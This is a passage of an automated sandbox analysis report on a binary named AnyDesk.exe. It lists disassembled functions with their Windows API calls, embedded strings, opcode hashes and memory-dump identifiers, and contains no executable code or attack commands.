                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: ad876e0d40689751439811bd681239b75c2037bb68574cbf1202f9ac780aae20
                                                                                                                                                                                                                                                  • Instruction ID: d80c71bf7828a8826a55e650290669106038e5b8c3364bebafcbe71577cc52f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad876e0d40689751439811bd681239b75c2037bb68574cbf1202f9ac780aae20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E41F036F402009FCB14DF78D981A5AB7F5EF89B14F1181AAE915EF381EB31A901CB81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 0fc3b217f0d6cf1ce1c0e0f5abe0857497b5959951e1aec6f056f6c4bdd8785d
                                                                                                                                                                                                                                                  • Instruction ID: e5dbf113ee24d703c38c7f6268f79904a8f0ba7735af938b9152f6c07b628d67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc3b217f0d6cf1ce1c0e0f5abe0857497b5959951e1aec6f056f6c4bdd8785d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88419F356406009FEB15CF2AE851B5AB3F0FF98724B10866DD44BDA2A1F731DA62CB48
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: ReadFile.KERNEL32(00000028,00000000,0000001C,0000001C,00000000,0000001C,00000000,00000000,?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D8A
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D94
                                                                                                                                                                                                                                                    • Part of subcall function 69C66D68: GetLastError.KERNEL32(?,?,69C660D0,0000001C,00000000,00000028), ref: 69C66D9F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000001C,00000000,00000000), ref: 69C665B7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$FileRead
                                                                                                                                                                                                                                                  • String ID: , observed $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io.cc$read$read: expected
                                                                                                                                                                                                                                                  • API String ID: 3644057887-3298404683
                                                                                                                                                                                                                                                  • Opcode ID: 9bb93a4095b997ee8bc3933a25fbfab6c3ce6b0dc35c8d27fa32eeb88dd74aa2
                                                                                                                                                                                                                                                  • Instruction ID: 9fe133d635cf75672a5bb0b2f6b4dbf4266113771bc13fe009e4f95d4be4dc3a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bb93a4095b997ee8bc3933a25fbfab6c3ce6b0dc35c8d27fa32eeb88dd74aa2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6215B3554071435DF24EA64FEA7FAD7719EF01368F50945AFD046A0D2FF3299414464
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66DDA: WriteFile.KERNEL32(0000001C,000000FF,69C66334,00000000,00000000,?,?,69C6668C,?,0000001C,69C66334,69C66334,000000FF,0000001C), ref: 69C66DF1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,000000FF,0000001C,00000001), ref: 69C666A2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                  • String ID: , observed $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\file\file_io.cc$write$write: expected
                                                                                                                                                                                                                                                  • API String ID: 442123175-2204066763
                                                                                                                                                                                                                                                  • Opcode ID: 4b6e522d72fcfbe9fdd9001fd0ad95922c419d9bd9e37025a32aad9f20258b55
                                                                                                                                                                                                                                                  • Instruction ID: c09382b090d5002446936005d5c0cdb503b567d7c532e1d0fbd80aaec8dc0ac5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6e522d72fcfbe9fdd9001fd0ad95922c419d9bd9e37025a32aad9f20258b55
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5215B395407182AEB24EA64FDA6FAD3759EF01368F509459E9052E0D2FF3299414064
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 69C629F9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • microsoft-edge:, xrefs: 69C62991
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\chrome\installer\util\google_chrome_distribution.cc, xrefs: 69C62A03
                                                                                                                                                                                                                                                  • <, xrefs: 69C629A4
                                                                                                                                                                                                                                                  • Failed to launch Edge for uninstall survey, xrefs: 69C62A16
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: <$Failed to launch Edge for uninstall survey$c:\b\build\slave\win\build\src\chrome\installer\util\google_chrome_distribution.cc$microsoft-edge:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-2957470658
                                                                                                                                                                                                                                                  • Opcode ID: fc0a4aeec97170dd8bccd3f5fb9dff71773aba3212cd966dde5d928c18cc55ab
                                                                                                                                                                                                                                                  • Instruction ID: c6d646ceb09cfbcd287083bd7f8afc9c9dc7fdeecf11ac667e3ea181e08999fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc0a4aeec97170dd8bccd3f5fb9dff71773aba3212cd966dde5d928c18cc55ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1821957494030C9EDB14DFA4ECA1BEEB7B8EB05308F405056D915AA1C1FB755606CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 69C57757
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C5777A
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 69C577A0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C577B3
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 69C577C2
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                                                                  • Opcode ID: 8e4e59301f9f954a71003d92c81e41ade1cea1e40d7acaf1c7f171e7079cc2a5
                                                                                                                                                                                                                                                  • Instruction ID: c13b4985163d2c83b96a05e1145d6e6366632531b33a3fac8bae849deecc18e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4e59301f9f954a71003d92c81e41ade1cea1e40d7acaf1c7f171e7079cc2a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB01B1766016657B2B12497B7C9CC7B2ABDEAC6AE03008129BD19C2210FA61CC6291B5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,69C460F1,00000000,?,?,69C46175,00000000,00000000,00000000,00000000,00000000,0000010C,69C322CA), ref: 69C4FCA3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FCD8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FCFF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0000010C,69C322CA), ref: 69C4FD0C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0000010C,69C322CA), ref: 69C4FD15
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 08b746ec88f2cc767dcfd01b37ed8ba42adf5ecd25cd7f6b282c6bbe93331e31
                                                                                                                                                                                                                                                  • Instruction ID: f11e7eea43045784bfd1c7baf03ccfc903831d2c7a6b171cd488a2842af861d2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b746ec88f2cc767dcfd01b37ed8ba42adf5ecd25cd7f6b282c6bbe93331e31
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F801F93A3846516FE7125D297E44E5F223DAFC3FB97215025FC01A2281FF208806A171
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59D85
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59D97
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DA9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DBB
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C59DCD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: c833178f246cacef0d550a646a94e2bc2f61555b985282c7e38173d6c2afd68e
                                                                                                                                                                                                                                                  • Instruction ID: bf0940333f0b2532170e5da799a519e847c78163a957ea9fecb205641815c772
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c833178f246cacef0d550a646a94e2bc2f61555b985282c7e38173d6c2afd68e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F096725047545BEF00DB58F081C5773F9FA81B24790C846FC59EB550E731F8A58694
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F564: GetVersionExW.KERNEL32(0000011C), ref: 69C5F59E
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 69C5F744
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 69C5F759
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F711: FreeSid.ADVAPI32(?), ref: 69C5F769
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 69C5F50F
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 69C5F516
                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,00000000), ref: 69C5F53A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F547
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C5F553
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Token$CloseHandleProcess$AllocateCheckCurrentFreeInformationInitializeMembershipOpenVersion
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3927590866-0
                                                                                                                                                                                                                                                  • Opcode ID: 54f257d3a3368ceb7a5c4342bb50bee0bc4e714fc8276e46f349524861c30a26
                                                                                                                                                                                                                                                  • Instruction ID: ed7db9ac26be11ebd30baa199087140f87b114bcb5711b66d83c2d83eb523c76
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54f257d3a3368ceb7a5c4342bb50bee0bc4e714fc8276e46f349524861c30a26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F019B5900218EFDF04DFE1A909BAD7BBCAF06359F804090AA5696081E7719629FB16
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2F453
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2F45D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 934aa1f543073766f83cc338f2411068fe56e67913036ae8edbb69202f15ef77
                                                                                                                                                                                                                                                  • Instruction ID: 61b8baf3bb81227ca3335b1c4d8168fb133d6810f4e2a3624a13f0f54164463b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 934aa1f543073766f83cc338f2411068fe56e67913036ae8edbb69202f15ef77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A151AC7160021D9FCB24CF69F8D085EB3A9FF887447604A2EE856CB250FB71E951DBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2684A
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26854
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 88ca931c0d353afd6c3bcd1fc43686e60308509325d1c492f5dbffbf18fc9975
                                                                                                                                                                                                                                                  • Instruction ID: 5c5fe0ad0c539e4f52a7caa0980522d76e9a03004aae3fbf4b127834e051f1e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ca931c0d353afd6c3bcd1fc43686e60308509325d1c492f5dbffbf18fc9975
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C351D0367047149FD724CE6CF99095AB7E9FF947687104A2FE495CB250EB31E84087B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C2793F
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C27949
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 2e24a158de6120b47befaffccdb227417539d0c12729c52d986d9cecd8e4777f
                                                                                                                                                                                                                                                  • Instruction ID: bc01b12c92098c2dfd23724675cfbceca225e8d3d353a0ba2f16286a08ca7ecf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e24a158de6120b47befaffccdb227417539d0c12729c52d986d9cecd8e4777f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D951D132B002149FD724CE1CF8C0A5EB7A6FF91744B604A2AE5A5DB681F731F850DBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\WinNet\AnyDesk.exe,00000104), ref: 69C4D387
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4D452
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4D45C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-3295360309
                                                                                                                                                                                                                                                  • Opcode ID: a437fc903e06646d58fd2a747e65bcd99371aa188e788aa49301f5e2baa2c5d5
                                                                                                                                                                                                                                                  • Instruction ID: 4204d4a3b3922af1b5a02776b8c6c9303fb100e66ee71066e3e979fc64a3f5a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a437fc903e06646d58fd2a747e65bcd99371aa188e788aa49301f5e2baa2c5d5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A318475B00658EFDB11EF99A980D9EBBFCEF85B14F109067E90497210E770AA41CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26A09
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C26A13
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 35d1c9ec29735bdf79bd5aa469609318a87ea68aac3edde3b2fb76fe2b7b746d
                                                                                                                                                                                                                                                  • Instruction ID: d4bba0d876c074bc56d01e44c4e995e3150304278bffe725f3ea2fffeee81e02
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d1c9ec29735bdf79bd5aa469609318a87ea68aac3edde3b2fb76fe2b7b746d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E31C731304A149FD720DF5CF980A5EB7A9FBD1654B208A2FE591CB281EB71E84087B1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C21F48
                                                                                                                                                                                                                                                    • Part of subcall function 69C21E30: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 69C21E54
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000), ref: 69C21F81
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000004,00000003,00000000,00000004,00000080,00000000,?,debug.log), ref: 69C22032
                                                                                                                                                                                                                                                  Strings
